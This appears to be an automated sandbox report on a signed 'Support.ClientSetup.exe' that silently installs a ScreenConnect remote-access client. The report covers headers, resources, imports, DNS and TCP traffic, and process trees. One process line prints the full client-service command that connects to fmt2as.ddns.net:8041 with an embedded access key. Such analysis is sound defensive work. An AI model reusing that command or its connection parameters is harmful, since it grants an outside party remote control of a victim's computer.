                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x4014ad
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:5
                                                                                                                                        OS Version Minor:1
                                                                                                                                        File Version Major:5
                                                                                                                                        File Version Minor:1
                                                                                                                                        Subsystem Version Major:5
                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                        Import Hash:9771ee6344923fa220489ab01239bdfd

                                                                                                                                        Authenticode Signature

                                                                                                                                        Signature Valid:true
                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                        Error Number:0
                                                                                                                                        Not Before, Not After
                                                                                                                                        • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                        Subject Chain
                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        call 00007F82350397DAh
                                                                                                                                        jmp 00007F823503928Fh
                                                                                                                                        push ebp
                                                                                                                                        mov ebp, esp
                                                                                                                                        push 00000000h
                                                                                                                                        call dword ptr [0040D040h]
                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                        call dword ptr [0040D03Ch]
                                                                                                                                        push C0000409h
                                                                                                                                        call dword ptr [0040D044h]
                                                                                                                                        push eax
                                                                                                                                        call dword ptr [0040D048h]
                                                                                                                                        pop ebp
                                                                                                                                        ret
                                                                                                                                        push ebp
                                                                                                                                        mov ebp, esp
                                                                                                                                        sub esp, 00000324h
                                                                                                                                        push 00000017h
                                                                                                                                        call dword ptr [0040D04Ch]
                                                                                                                                        test eax, eax
                                                                                                                                        je 00007F8235039417h
                                                                                                                                        push 00000002h
                                                                                                                                        pop ecx
                                                                                                                                        int 29h
                                                                                                                                        mov dword ptr [004148D8h], eax
                                                                                                                                        mov dword ptr [004148D4h], ecx
                                                                                                                                        mov dword ptr [004148D0h], edx
                                                                                                                                        mov dword ptr [004148CCh], ebx
                                                                                                                                        mov dword ptr [004148C8h], esi
                                                                                                                                        mov dword ptr [004148C4h], edi
                                                                                                                                        mov word ptr [004148F0h], ss
                                                                                                                                        mov word ptr [004148E4h], cs
                                                                                                                                        mov word ptr [004148C0h], ds
                                                                                                                                        mov word ptr [004148BCh], es
                                                                                                                                        mov word ptr [004148B8h], fs
                                                                                                                                        mov word ptr [004148B4h], gs
                                                                                                                                        pushfd
                                                                                                                                        pop dword ptr [004148E8h]
                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                        mov dword ptr [004148DCh], eax
                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                        mov dword ptr [004148E0h], eax
                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                        mov dword ptr [004148ECh], eax
                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                        mov dword ptr [00414828h], 00010001h

                                                                                                                                        Rich Headers

                                                                                                                                        Programming Language:
                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                        • [IMP] VS2008 build 21022

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x16a20
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                        FILES0x163d40x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3962220149253731
                                                                                                                                        FILES0x9c3d40x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111589431762695
                                                                                                                                        FILES0x2409d40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415066442757009
                                                                                                                                        FILES0x25b5d40x2ec318PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9810924530029297
                                                                                                                                        FILES0x5478ec0x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                                                                        RT_MANIFEST0x548eec0x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        mscoree.dllCorBindToRuntimeEx
                                                                                                                                        KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                                                                        OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData

                                                                                                                                        Possible Origin

                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        EnglishUnited States

                                                                                                                                        Network Behavior

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Dec 4, 2024 20:05:37.031541109 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:37.151654959 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:37.151762962 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:37.429228067 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:37.553817987 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:38.429847956 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:38.484217882 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:38.487528086 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:38.607389927 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:38.972326040 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:39.012238979 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:39.164134026 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:39.222285986 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:40.520812988 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:40.520903111 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:05:40.640819073 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:40.640834093 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:40.640899897 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:40.640909910 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:40.641001940 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:40.977624893 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:05:41.021239996 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:06:40.992505074 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:06:41.122241020 CET804149707194.59.31.27192.168.2.17
                                                                                                                                        Dec 4, 2024 20:07:41.123716116 CET497078041192.168.2.17194.59.31.27
                                                                                                                                        Dec 4, 2024 20:07:41.243910074 CET804149707194.59.31.27192.168.2.17

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Dec 4, 2024 20:05:36.747665882 CET6387053192.168.2.171.1.1.1
                                                                                                                                        Dec 4, 2024 20:05:36.995045900 CET53638701.1.1.1192.168.2.17

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Dec 4, 2024 20:05:36.747665882 CET192.168.2.171.1.1.10xa41eStandard query (0)fmt2as.ddns.netA (IP address)IN (0x0001)false

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Dec 4, 2024 20:05:36.995045900 CET1.1.1.1192.168.2.170xa41eNo error (0)fmt2as.ddns.net194.59.31.27A (IP address)IN (0x0001)false

                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:14:05:30
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Users\user\Desktop\Support.ClientSetup.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\Support.ClientSetup.exe"
                                                                                                                                        Imagebase:0xc30000
                                                                                                                                        File size:5'622'816 bytes
                                                                                                                                        MD5 hash:6B40938A0C9723DB144782829B133286
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1074872097.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1080490569.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1069609177.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:2
                                                                                                                                        Start time:14:05:31
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi"
                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                        File size:59'904 bytes
                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:3
                                                                                                                                        Start time:14:05:31
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                        Imagebase:0x7ff659530000
                                                                                                                                        File size:69'632 bytes
                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:14:05:31
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 5BDEFC20929AF4DEE946C247B81361C3 C
                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                        File size:59'904 bytes
                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:14:05:31
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                        Imagebase:0xd10000
                                                                                                                                        File size:61'440 bytes
                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:6
                                                                                                                                        Start time:14:05:34
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C21885174D7F3F417F2722ACC2A29DD7
                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                        File size:59'904 bytes
                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:7
                                                                                                                                        Start time:14:05:34
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C5E78E314317E5DB1425C419FD0D614F E Global\MSI0000
                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                        File size:59'904 bytes
                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:8
                                                                                                                                        Start time:14:05:34
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c="
                                                                                                                                        Imagebase:0xa0000
                                                                                                                                        File size:95'512 bytes
                                                                                                                                        MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:9
                                                                                                                                        Start time:14:05:35
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "24be1ff4-4556-4f6e-bdeb-6bf05204e79c" "User"
                                                                                                                                        Imagebase:0x8d0000
                                                                                                                                        File size:602'392 bytes
                                                                                                                                        MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:11
                                                                                                                                        Start time:14:05:38
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "3473749a-8727-4cb2-bb44-83e8e8d9f56c" "System"
                                                                                                                                        Imagebase:0xfc0000
                                                                                                                                        File size:602'392 bytes
                                                                                                                                        MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:14:05:44
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:13
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:14
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                        Imagebase:0x7ff6ee970000
                                                                                                                                        File size:329'504 bytes
                                                                                                                                        MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:15
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:16
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:17
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:23
                                                                                                                                        Start time:14:06:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                        Imagebase:0x7ff731050000
                                                                                                                                        File size:468'120 bytes
                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:24
                                                                                                                                        Start time:14:06:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff772470000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Disassembly

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:13.6%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:20%
                                                                                                                                          Total number of Nodes:25
                                                                                                                                          Total number of Limit Nodes:2
